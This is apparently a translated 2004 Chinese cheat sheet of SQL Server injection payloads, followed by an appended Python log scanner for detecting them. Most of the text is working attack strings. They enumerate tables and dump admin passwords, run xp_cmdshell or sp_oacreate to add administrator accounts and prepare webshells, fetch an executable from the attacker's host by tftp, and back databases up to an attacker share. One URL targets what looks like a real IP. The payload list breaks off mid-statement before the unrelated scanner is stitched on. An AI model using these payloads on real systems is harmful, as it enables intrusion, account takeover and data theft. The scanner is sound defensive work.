
SQL injection summary (highly recommended)

04-11-07        Source: [db:作者]

SQL injection summary (it all started with or 1=1)

The most important table names:
select * from sysobjects
sysobjects ncsysobjects
sysindexes tsysindexes
syscolumns
systypes
sysusers
sysdatabases
sysxlogins
sysprocesses


The most important user names (present in a default SQL Server database)
public
dbo
guest (usually disabled, or without permissions)
db_securityadmin
db_ddladmin

Some default extended stored procedures


xp_regaddmultistring
xp_regdeletekey
xp_regdeletevalue
xp_regenumkeys
xp_regenumvalues
xp_regread
xp_regremovemultistring
xp_regwrite
xp_availablemedia  drive information
xp_dirtree  directory tree
xp_enumdsn  ODBC connections
xp_loginconfig  server security mode information
xp_makecab  create a compressed archive
xp_ntsec_enumdomains  domain information
xp_terminate_process  terminate a process, given a PID

For example:
sp_addextendedproc 'xp_webserver', 'c:\temp\xp_foo.dll'
exec xp_webserver
sp_dropextendedproc 'xp_webserver'
bcp "select * FROM test..foo" queryout c:\inetpub\wwwroot\runcommand.asp -c -Slocalhost -Usa -Pfoobar
group by users.id having 1=1--
group by users.id, users.username, users.password, users.privs having 1=1--
; insert into users values( 666, 'attacker', 'foobar', 0xffff )--

union select TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME='logintable'--
union select TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME='logintable' and COLUMN_NAME NOT IN ('login_id')--
union select TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME='logintable' and COLUMN_NAME NOT IN ('login_id','login_name')--
union select TOP 1 login_name FROM logintable--
union select TOP 1 password FROM logintable where login_name='Rahul'--
Constructed statements: checking whether xp_cmdshell exists
union select @@version,1,1,1--
and 1=(select @@VERSION)
and 'sa'=(select System_user)
union select ret,1,1,1 from foo--
union select min(username),1,1,1 from users where username > 'a'--
union select min(username),1,1,1 from users where username > 'admin'--
union select password,1,1,1 from users where username = 'admin'--
and user_name()='dbo'
and 0<>(select user_name())--
; DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user swap 5245886 /add'
and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')
;EXEC master.dbo.sp_addextendedproc 'xp_cmdshell', 'xplog70.dll'


1=(%20select%20count(*)%20from%20master.dbo.sysobjects%20where%20xtype='x'%20and%20name='xp_cmdshell')
and 1=(select IS_SRVROLEMEMBER('sysadmin'))  checks whether the login has sysadmin (sa) rights
and 0<>(select top 1 paths from newtable)--  the path-dumping trick
and 1=(select name from master.dbo.sysdatabases where dbid=7)  gets a database name (dbid 1 to 5 are system databases; only 6 and above identify user databases)
Create a virtual directory for drive E:
declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'cscript.exe c:\inetpub\wwwroot\mkwebdir.vbs -w "默认 Web 站点" -v "e","e:"'
Set access permissions (used together with writing a webshell):
declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'cscript.exe c:\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e +browse'


and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)
Submit dbid = 7,8,9,... in turn to get more database names
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U')  dumps one table name, assume it is admin

and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U' and name not in ('Admin'))  to get the other tables.
and 0<>(select count(*) from bbs.dbo.sysobjects where xtype='U' and name='admin' and uid>(str(id)))  dumps the uid value, assume it is 18779569 (uid=id)
and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569)  gets one column of admin, assume it is user_id
and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569 and name not in ('id',...))  to dump the other columns
and 0<(select user_id from BBS.dbo.admin where username>1)  can get the user name
The password can be obtained the same way, assuming columns such as user_id, username and password exist

Show.asp?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin
Show.asp?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin
(union statements are everywhere; they work on Access too)

Special database-dumping trick: %5c=, or replace the / (or \) with %5c and submit
and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U')  gets a table name
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U' and name not in('Address'))
and 0<>(select count(*) from bbs.dbo.sysobjects where xtype='U' and name='admin' and uid>(str(id)))  determines the id value
and 0<>(select top 1 name from BBS.dbo.syscolumns where id=773577794)  all columns

http://xx.xx.xx.xx/111.asp?id=3400;create table [dbo].[swap] ([swappass][char](255));--

http://xx.xx.xx.xx/111.asp?id=3400 and (select top 1 swappass from swap)=1
;create TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare @test varchar(20) exec master..xp_regread @rootkey='HKEY_LOCAL_MACHINE', @key='SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots', @value_name='/', values=@test OUTPUT insert into paths(path) values(@test)

http://61.131.96.39/PageShow.asp?TianName=政策法规&InfoID={57C4165A-4206-4C0D-A8D2-E70666EE4E08};use%20master;declare%20@s%20%20int;exec%20sp_oacreate%20"wscript.shell",@s%20out;exec%20sp_oamethod%20@s,"run",NULL,"cmd.exe%20/c%20ping%201.1.1.1";--


With the web path d:\xxxx obtained, next:
http://xx.xx.xx.xx/111.asp?id=3400;use ku1;--
http://xx.xx.xx.xx/111.asp?id=3400;create table cmd (str image);--


The traditional test procedure when xp_cmdshell exists:
;exec master..xp_cmdshell 'dir'
;exec master.dbo.sp_addlogin 'hax';--
;exec master.dbo.sp_password null,'hax','hax';--
;exec master.dbo.sp_addsrvrolemember 'hax' sysadmin;--
;exec master.dbo.xp_cmdshell 'net user hax 5258 /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--
;exec master.dbo.xp_cmdshell 'net localgroup administrators hax /add';--
exec master..xp_servicecontrol 'start', 'schedule'
exec master..xp_servicecontrol 'start', 'server'
http://www.xxx.com/list.asp?classid=1; DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user swap 5258 /add'
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net localgroup administrators swap /add'

http://localhost/show.asp?id=1; exec master..xp_cmdshell 'tftp -i youip get file.exe'--

declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:\'
declare @a sysname set @a='xp'+'_cm'+'dshell' exec @a 'dir c:\'
;declare @a;set @a=db_name();backup database @a to disk='\\你的IP\你的共享目录\bak.dat'
These work when the direct call is restricted.
select * from openrowset('sqloledb','server';'sa';'','select ''OK!'' exec master.dbo.sp_addlogin hax')
Traditional query construction:
select * FROM news where id=... AND topic=... AND .....
admin' and 1=(select count(*) from [user] where username='victim' and right(left(userpass,01),1)='1') and userpass <> '
select 123;--
;use master;--
:a' or name like 'fff%';--  shows that there is a user called ffff.
and 1<>(select count(email) from [user]);--
;update [users] set email=(select top 1 name from sysobjects where xtype='u' and status&
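As an added defensive example (not from the original page), the following Python request-log scanner recognizes the payload families catalogued above: the sysobjects/syscolumns/sysdatabases catalog probes, the stacked sp_oacreate and xp_cmdshell chains, the union probes, the @@version / IS_SRVROLEMEMBER privilege checks, and the 'xp_'+'cmdshell' string-splitting that defeats a plain substring filter. The log lines are constructed samples, and the signature names are my own.

```python
import re
from urllib.parse import unquote

# Signature families, matched against a normalized copy of the request so the
# URL-encoding and string-concatenation tricks on the page do not hide keywords.
SIGNATURES = {
    "catalog_recon": r"\b(sysobjects|syscolumns|sysdatabases|sysxlogins|information_schema)\b",
    "stacked_exec": r";\s*(exec|declare|create\s+table|use\s+master|update|insert|backup)\b",
    "extended_proc": r"\b(xp_cmdshell|xp_regread|xp_regwrite|xp_dirtree|sp_oacreate|sp_oamethod"
                     r"|sp_addextendedproc|sp_addlogin|sp_addsrvrolemember|openrowset|xp_servicecontrol)\b",
    "union_probe": r"\bunion\s+(all\s+)?select\b",
    "privilege_probe": r"(@@version|is_srvrolemember|system_user|user_name\s*\()",
}

def normalize(request):
    """Canonicalize a request the way the database would effectively see it:
    URL-decode twice (catches %2527-style double encoding), lower-case,
    join 'xp_'+'cmdshell' style fragments, drop block comments, squeeze spaces."""
    text = unquote(unquote(request)).lower()
    text = re.sub(r"'\s*\+\s*'", "", text)      # 'xp_'+'cmdshell' -> 'xp_cmdshell'
    text = re.sub(r"/\*.*?\*/", " ", text)      # remove /* ... */ comments
    return re.sub(r"\s+", " ", text)

def classify(request):
    """Return the signature families present in one request (empty list if clean)."""
    text = normalize(request)
    return [name for name, pattern in SIGNATURES.items() if re.search(pattern, text)]

def naive_match(request, keyword="xp_cmdshell"):
    """The plain substring check that the concatenation trick above is built to evade."""
    return keyword in request.lower()

def scan(requests):
    """Map each flagged request to the families it triggered."""
    return {r: hits for r in requests if (hits := classify(r))}

# Constructed sample request lines (not real traffic), shaped like the payloads above.
SAMPLE_REQUESTS = [
    "/show.asp?id=3400",
    "/show.asp?id=3400%20and%200<>(select%20top%201%20name%20from%20bbs.dbo.sysobjects%20where%20xtype='U')",
    "/list.asp?classid=1;%20DECLARE%20@shell%20INT%20EXEC%20SP_OAcreate%20'wscript.shell',@shell%20OUTPUT",
    "/show.asp?id=1;declare%20@a%20sysname%20set%20@a='xp_'%2B'cmdshell'%20exec%20@a%20'dir%20c:\\'",
    "/show.asp?id=-1%20union%20select%201,2,3,4,5,6,7,8,*,9,10,11,12,13%20from%20admin",
]

if __name__ == "__main__":
    for req, hits in scan(SAMPLE_REQUESTS).items():
        print(hits, req)
```

The fourth sample is the one to watch: `naive_match` never sees xp_cmdshell in it, while `classify` reports both a stacked statement and an extended procedure after normalization.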
